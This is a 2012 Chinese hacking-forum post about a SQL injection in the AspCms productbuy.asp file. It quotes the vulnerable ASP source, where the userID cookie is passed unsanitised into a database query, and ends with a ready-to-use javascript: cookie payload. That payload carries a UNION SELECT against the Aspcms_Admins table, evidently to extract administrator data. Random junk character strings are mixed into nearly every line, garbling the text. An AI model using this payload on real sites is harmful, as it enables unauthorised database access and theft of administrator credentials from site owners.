好久没上土司了,上来一看发现在删号名单内.....5 B! x' T( T! t. S* R) z
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
+ e+ y2 \: `7 K& r" x废话不多说,看代码:" `3 e, e% }8 o }6 O5 c
( H" m2 P' n8 j+ n7 w<%2 ?' P4 A5 X0 G) e- B8 v: l4 \: Q
2 L8 v$ l9 b; i# F2 j0 Vif action = "buy" then
9 H3 ^3 {2 g& A( O: ~6 X* x) k3 I2 i' J) X3 b' J! j
addOrder()5 {9 c0 S8 {# m# U; m2 @2 W
( {. I x4 l' @ _( X- u w6 F% J0 Jelse
6 ?: N+ z J1 R* H$ J1 |
. Z G$ _6 c' a2 [ echoContent(), g; c I; k4 h: K
8 r- a; o! r$ Q$ ]8 P# ^0 y5 j# |end if
9 h9 {5 L6 Y5 b! i8 V' a4 u
- k. U7 f) Q1 ?4 _7 V1 m% ?$ m p/ M% B2 p W! Y
& e0 k2 J# E$ o: ^, _……略过# n& @4 z) w, X
7 ?: x3 X& M( T# u: o |
0 M; I4 u: d( J) l6 w. O/ ~$ i: q
5 M$ b$ h" u6 |6 v# ?# i# YSub echoContent()
$ B; k" Y3 _( W* [7 Q0 r% ~* n
" A, i5 Y. c' C: V- H3 I. y dim id- M' V; \. f% x
7 u( k9 N$ S( Y) X id=getForm("id","get")
2 D- ^# ~& j) M% e1 E' Z, U: k! f9 C, ?
2 e [7 D: _0 v- B
. C' x: P: p1 L: T if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
$ z* I+ P$ E) ]9 {+ o3 l W0 F1 B# ?/ }: _' z- _
/ M; i* _# j' h, w/ n$ |0 m4 k) i7 k5 t- s1 T
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")$ A! c" _+ T. e" F
6 L5 v. [! a% w dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct# W; a# V8 H& p% b
* S: t _# ^ z: q Dim templatePath,tempStr
: u6 X$ a0 u( F2 a! @' \) |& J( u$ [* E% H. _+ n; S1 A
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
5 q7 g9 ~* d4 J- ?( n1 x
& G6 ?3 x, A# k+ m+ S2 r
7 q( `+ F- L3 W5 | ~& J( D/ f( m* @" y) n, M9 s
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"). f3 ^5 n) W& b7 U. e1 {- \* z
7 m# }7 c; h) a: q* Z0 ? selectproduct=rsObj(0)
- {4 ?6 y, q/ f) ]" y5 `9 u! s8 X. j; T1 O& ]! y; h
, ^1 d' v5 t+ G7 B* Y" h4 i, l
" E9 o2 }( h. {. F+ m$ k1 c
Dim linkman,gender,phone,mobile,email,qq,address,postcode
* |1 d- F& f R. J5 c1 o6 S1 s0 a
; n/ M+ S9 H+ [) ~; ^, N6 d if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0. o/ C* {; Q- f& A. C' J
[( D$ [" _ |# z4 f; t3 a if rCookie("loginstatus")=1 then * y4 ]. R9 H1 W, @/ J9 M
/ f. I/ d7 ~9 k1 ^2 k: _4 h set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1"), c* a9 v/ S( I, Q. u1 O6 X( `. t+ f
' Z, a6 w/ h, v! F! ]) ?; N$ P$ V
linkman=rsObj("truename"). }+ W% Z! H, e7 @% t" `) u; u9 q
, \. z6 [: j3 f$ x/ f gender=rsObj("gender")) x0 U' m" k$ e. z7 ~1 Z; n
9 p; Z. F& C/ |7 m+ ^
phone=rsObj("phone")( ?! J5 f4 I" k7 P; ^
- a0 g2 y7 f( ~, m. }
mobile=rsObj("mobile")
0 }: R/ i: H7 H0 C* j( m: c' C! _. W
2 d/ {9 H. t {( \6 | email=rsObj("email"), U6 Q5 n. d6 r$ \
' E3 n' l/ |$ Y& a Y" S$ o8 j
qq=rsObj("qq")
& v" I4 L0 Y) [& M( j
$ |3 K- z* \# `" x# |+ E address=rsObj("address")* i5 S' w9 n3 U
3 k; s! v3 a3 O& @: d6 { postcode=rsObj("postcode")
2 |* R. [( h0 a) F8 K5 Z/ G1 q0 @7 ?7 g/ s6 S( F
else , }7 O, H" i( _& _
7 O4 A. N' |$ X$ w' \7 I# o gender=1
( p( n+ {' i; l4 b }2 v
4 |, I: p$ i& @ end if
6 U, {4 _8 o# M: L, Q
" N9 f6 W, s4 \9 X$ g2 E6 q rsObj.close()
3 w; H( h! [+ i# i; g" E& B6 W/ t+ ], U2 _% Q) k: p
9 x0 @! i* { v. f) N) o$ [+ \) T& y2 x8 f9 i4 |, q
with templateObj " ], d- T! G) C: H7 Z- g
( V, `7 R! l9 J. F0 N0 v+ b .content=loadFile(templatePath)
/ F1 k! t9 W& d, W# S" ]8 _& I* ?
) q2 B( G) R6 C$ J% R% d .parseHtml()
y8 O; k# v4 q( Y+ V- w
* f/ E, d5 L0 ?$ i; k .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)( _7 }9 S1 F1 O
! o4 g+ r# u: P, r$ x* L! C .content=replaceStr(.content,"[aspcms:linkman]",linkman) 3 f5 @ o1 X5 N& R9 A% V% U4 D
" t& _9 f$ x* j
.content=replaceStr(.content,"[aspcms:gender]",gender)
& M( U T5 w; d# R/ ]/ H
& d! j1 |8 r* N .content=replaceStr(.content,"[aspcms:phone]",phone)
4 d% ^% c# h K+ @
T! E! ?' m7 [4 y$ x .content=replaceStr(.content,"[aspcms:mobile]",mobile)
" H2 B h1 I. ]* o. F5 H% y: A
.content=replaceStr(.content,"[aspcms:email]",email) 0 T) `( S" h# n7 N5 c! P4 u( r0 @
4 p( t( a6 _. E* w .content=replaceStr(.content,"[aspcms:qq]",qq) ; s* t+ r% {+ J# Y( z- W; a
1 N6 O. a0 c$ D& o- @/ @, O' { .content=replaceStr(.content,"[aspcms:address]",address)
) m, N0 b: v' y& r
% b9 [+ e& h3 O: G( z .content=replaceStr(.content,"[aspcms:postcode]",postcode)
& R8 d6 d/ y! @/ E
~) z8 m7 D6 _9 ]1 Q .parseCommon()
/ [( }, S4 r8 W; }- n
7 }, H- \/ c" e- I }7 i0 L- | echo .content 4 ?$ ^/ i# j3 L/ Z( i2 u
: G6 h& Y" E: x7 Y5 t, A: P( g" I
end with
; i i& d% o6 b/ }8 ~& A7 u
' J. a$ ]3 o* @8 @8 q) `) \ set templateobj =nothing : terminateAllObjects
H: P( ]6 W m# m) z6 Q# i) r; ]
End Sub
6 Y$ @6 N( ?9 i0 i9 ]漏洞很明显,没啥好说的
2 ?4 d+ F8 D- V8 }$ xpoc:
8 u# l0 V3 C' n3 a; q2 H
3 l9 Q$ p: g. } B Pjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子" x. [. N2 ?$ d
/ D3 e6 w" x' f, j
|
发表于 2012-12-27 08:35:05
收藏
支持
反对